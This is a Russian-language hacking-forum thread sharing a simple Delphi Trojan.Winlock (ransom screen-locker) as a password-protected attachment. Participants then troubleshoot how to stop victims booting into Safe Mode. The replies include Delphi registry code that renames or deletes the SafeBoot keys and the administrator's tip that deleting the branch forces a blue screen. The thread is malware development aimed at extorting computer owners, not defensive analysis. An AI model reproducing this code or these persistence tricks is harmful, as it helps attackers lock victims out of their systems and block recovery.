• Привет !

    На форуме есть зеркало в ТОРе:rusfwz3cukdej7do.onion

    Обратная связь:info@ru-sfera.org

    Всего доброго !

Простенький Trojan.Winlock на делфи (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 388
Репутация
7 878
Telegram
Trojan.Winlock (Винлокер) — семейство вредоносных программ, блокирующих или затрудняющих работу с операционной системой, и требующих перечисление денег злоумышленникам за восстановление работоспособности компьютера. Впервые появились в конце 2007 года. Широкое распространение вирусы-вымогатели получили зимой 2009—2010 года, по некоторым данным оказались заражены миллионы компьютеров, преимущественно среди пользователей русскоязычного Интернета. Второй всплеск активности такого вредоносного ПО пришелся на май 2010 года.

Ранее для перевода денег обычно использовались короткие премиум-номера, в настоящее время подобные программы также могут требовать перечисления денег на электронные кошельки (например, «Яндекс.Деньги»), либо баланс мобильного номера. Необходимость перевести деньги часто объясняется тем, что «Вы получили временный бесплатный доступ к сайту для взрослых, необходимо оплатить продолжение его использования», либо тем, что «на Вашем компьютере обнаружена нелицензионная копия Windows». Также возможен вариант «за просмотр и копирование и тиражирование видео с насилием над детьми и педофилии». Пути распространения Trojan.Winlock и подобных вирусов разнообразны, в значительной части случаев инфицирование происходит через уязвимости браузеров при просмотре зараженных сайтов, либо при использовании мошенниками специальных «связок», позволяющих заражать только необходимые компьютеры также через браузер.

Trojan.Winlock условно можно разделить на 3 типа, в зависимости от того, насколько они затрудняют работу для пользователя:
1 тип — это баннеры или порноинформеры, появляющиеся только в окне браузера. Наиболее легко удаляемый тип. Обычно они выдают себя за дополнительные плагины или надстройки для браузера.

2 тип — это баннеры, которые остаются на рабочем столе после закрытия браузера и при этом закрывают большую его часть. Но у пользователей обычно остаётся возможность открывать другие программы, в том числе диспетчер задач и редактор реестра.

3 тип — это тип баннеров, который загружается после полной загрузки рабочего стола Windows. Они закрывают практически весь рабочий стол, блокируют запуск диспетчера задач, редактора реестра, а также загрузку в безопасном режиме. Некоторые разновидности полностью блокируют клавиатуру, предоставляя пользователю лишь цифровые клавиши из своего «интерфейса», и рабочую мышь для ввода кода.

Пароль:111
 

Вложения

Anubis

Уважаемый пользователь
Форумчанин
Регистрация
22.11.2012
Сообщения
496
Репутация
224
Вы на дату посмотрите-все детектят
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 388
Репутация
7 878
Telegram

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 774
Теперь если нахожу исходник всегда смотрю,чем он отличается от предшественников:)Вот и тут,тема прописана насчёт отключения безопасного режима.Везде встречаю этот код,но он не работает.В безопасный попадаешь без проблем.
Код:
reg.MoveKey('System\CurrentControlSet\Control\SafeBoot\Minimal','System\CurrentControlSet\Control\SafeBoot\M',true);
  reg.CloseKey;
  reg.MoveKey('System\CurrentControlSet\Control\SafeBoot\NetWork','System\CurrentControlSet\Control\SafeBoot\N',true);
  reg.CloseKey;
Снимок.PNG
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 388
Репутация
7 878
Telegram
Антоха,

Способ 1.
Удалить ветку:
Код:
HKEY_LOCAL_МACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
в результате при попытке запуска безопасного режима появится BSOD.Отдыхай!!!

Способ 2.
Переименовать параметры Network и Minimal в
Код:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot
Есть ещё способ:http://www.raymond.cc/blog/disable-f8-key-to-block-access-to-safe-mode-during-windows-startup/
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 388
Репутация
7 878
Telegram

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 774
Это второй способ, попробуй первый с удалением ветки, либо третий !
Попозже попробуем,сча жрать варю))Но что-то я сомневаюсь,что первый способ прокатит,если с переименованием не получилось,то удаление...Хотя винлок запускался с правами администратора (без прав он вообще не работает),но переименовать ему не удаётся.Вроде на XP этот способ ещё катит.У меня же подопытная семёра.Наверное это UAC-хитрит что-то.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 388
Репутация
7 878
Telegram
А в 8-ке нет безопасного режима, потести в 8-ке, интересно как работать будет !Dmeh-Smeh-Smeh!!!
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 774
А в 8-ке нет безопасного режима, потести в 8-ке, интересно как работать будет !Dmeh-Smeh-Smeh!!!
Ну почему же нет,просто попасть сложнее.Кстати ты прав нужно тестить на "восьмёрке",хотя по идее уровень безопасности там должен быть выше.
З.Ы.А в третей статье,ты имеешь ввиду попробовать команды которые использует программа
DisableSafeMode?
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 774
Вот так должна удаляться ветка с Save Mode?Она не хочет удаляется или неправильно что-то сделано.
Код:
  unit Unit1;
 
interface
 
uses
  Windows, Messages, SysUtils, Variants, Classes,
  Graphics, Controls, Forms, Dialogs, Registry, StdCtrls;
 
type
  TForm1 = class(TForm)
	procedure FormCreate(Sender: TObject);
  private
	{ Private declarations }
  public
	{ Public declarations }
  end;
 
var
  Form1: TForm1;
 
implementation
 
{$R *.dfm}
 
procedure TForm1.FormCreate(Sender: TObject);
var reg: Tregistry;
begin
  reg := tregistry.create;
  reg.rootkey := HKEY_CURRENT_USER;
  reg.lazywrite := false;
  reg.DeleteKey('HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot');
  reg.Free;
end;
 
end.
Пароль:111
 

Вложения